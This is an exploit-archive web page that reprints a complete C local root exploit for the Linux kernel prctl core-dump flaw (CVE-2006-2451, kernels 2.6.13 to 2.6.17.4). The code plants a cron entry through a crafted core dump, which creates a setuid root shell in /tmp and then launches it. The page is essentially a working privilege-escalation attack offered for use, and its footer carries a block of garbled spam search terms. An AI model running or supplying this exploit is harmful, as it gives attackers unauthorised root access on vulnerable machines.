about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit




2006-07-12 Linux Kernel 2.6.13 <= 2.6.17.4 sys_prctl() Local Root Exploit
Rated as : Critical Risk
/*****************************************************/
/* Local r00t Exploit for:                           */
/* Linux Kernel PRCTL Core Dump Handling             */
/* ( BID 18874 / CVE-2006-2451 )                     */
/* Kernel 2.6.x  (>= 2.6.13 && < 2.6.17.4)           */
/* By:                                               */
/* - dreyer    <luna@aditel.org>   (main PoC code)   */
/* - RoMaNSoFt <roman@rs-labs.com> (local root code) */
/*                                  [ 10.Jul.2006 ]  */
/*****************************************************/

#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>

char
*payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n*
* * * *   root   cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755
/tmp/sh ; rm -f /etc/cron.d/core\n";

int main() { 
    int child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local
r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");

    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry\n");

    if ( !( child = fork() )) {
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. one minute (** please wait
**)\n");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when
finished) ...\n");
    system("/tmp/sh -i");
}
securitydot.net - 2006-07-12

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 09:17:47 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.telugu www.jhafdz index.php? +734299032 Www.malays news for c www.sexind www.08ok.c www.lziso. www.sexind &amp;a smb rename Foot boll bbs.16un.c M...d.txt? 2100-1030_ Www.milf.c mambo Remo t510t www.zjfuda www.sexind www.sixwap www.hbycls saheed kap &amp;a phpbb late Donne cale Jeak Apache 1. telugu sex paycom SXY SXY 14 kna XPLOIT yjcaifeng. news for c www.lhfuda www.slazyd ipb 1.3 fi Vedu sxe c&amp; www.tj268. Dog girl s &amp;a sex vidieo Www.humans sxe VNC_bypaut www.googir www.Livese